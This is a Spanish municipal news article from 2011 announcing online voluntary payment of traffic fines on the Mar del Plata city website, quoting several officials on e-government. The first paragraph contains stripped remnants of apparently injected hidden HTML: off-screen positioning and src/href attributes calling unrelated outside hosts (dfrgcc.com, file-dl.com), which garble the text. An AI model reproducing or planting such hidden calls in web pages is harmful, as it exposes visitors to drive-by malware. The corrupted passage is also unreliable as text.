28/06/2011, Locales

Impulsan Pago Voluntario de multas de tránsito a través del sitio oficial de la Municipalidad.

Se presentó, en la Secretaría de Gobierno (FOTO), el sistema de Pago Voluntario de multas de tránsito a través del sitio oficial de la Municipalidad. De esta manera, el ciudadano ingresa a www.mardelplata.gov.ar, hace click en el banner “Pago Voluntario” y allí se le pide el dominio del vehículo. Con ese dato se puede acceder a las infracciones existentes, se selecciona las que se quieren pagar de forma voluntaria, se imprime el recibo y se lo abona en cualquier punto autorizado. / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

“Lo que se ha puesto en marcha es una solución más sencilla para aquellos vecinos que tienen una infracción de tránsito y que debían concurrir a los Juzgados de Faltas como única forma de solución”, señaló Santiago Bonifatti, director de la Oficina de Descentralización y Mejora de la Administración, quien estuvo acompañado en la oportunidad por el titular de la Agencia de Recaudación Municipal Gabriel Ballarino, el Secretario de Gobierno, Ariel Ciano, la Directora de Tránsito Claudia Rodríguez y el Subsecretario de Informática y Telecomunicaciones de la comuna Renato Roselló.

Hemos puesto en marcha en nuestra pagina web el Pago Voluntario de Multas, donde a tres clicks de distancia los vecinos podrán consultar cuáles son sus infracciones, decidir cuál se abonará, imprimir el recibo y dirigirse a cualquiera de los Centros de Pago habilitados que tiene el municipio, donde se pueden pagar todo tipo de tasas municipales”, agregó el funcionario.

En ese sentido, Bonifatti agregó que “las infracciones que se puedan abonar serán aquellas que puedan elegirse y ser seleccionadas para el pago. Aquellas que no puedan pagarse voluntariamente -por ser consideradas faltas graves o porque la situación procesal así no lo permite- directamente se le da la dirección del juzgado para solucionar ese problema”, explicó.

“Esta política va en línea con mucha de las opciones que tiene nuestra página web, como el pago de tasas, servicios docentes con acceso a asambleas, incorporaciones al CEMA, etc, siempre utilizando este medio masivo para informar a los vecinos”, aseguró.

El sitio web como herramienta de acercamiento al ciudadano

Por su parte, Renato Roselló, remarcó la importancia de este procedimiento: “Esta solución es parte de una mayor, denominada Gobierno Electrónico. En realidad, lo que nosotros creemos es que –tal cual lo piensa el Intendente Pulti- es muy importante mejorar nuestra relación con el ciudadano a través de la tecnología. El Gobierno Electrónico consiste en que el ciudadano, a través de las nuevas tecnologías, tenga acceso a trámites con el municipio”, aseveró.

“La idea es ir incorporando nuevos trámites que se puedan hacer a través del sitio. Esto es mucho más sencillo, tanto para el contribuyente como para la Municipalidad. Se permite más control de gestión y es un paso importante hacia el gobierno electrónico.”

El Subsecretario de Informática y Telecomunicaciones de la Municipalidad hizo hincapié en la importancia del incremento de la utilización de la página www.mardelplata.gov.ar a la hora de facilitar algunos trámites. “A partir de la activación de este tipo de herramientas en el sitio, hace que éste no sea meramente institucional, sino que también se convierte en transaccional. Esto sube notablemente la cantidad de visitas. Con el tema de la selección de personal para el CEMA, se registraron aproximadamente 15 mil visitas diarias. Y como la Agencia de Recaudación Municipal (ARM) tiene varios trámites online, en los últimos dos años, el ingreso de usuarios al sitio ha aumentado en un ciento por ciento. Cada vez que activamos algo nuevo, tenemos una respuesta inmediata”, concluyó.



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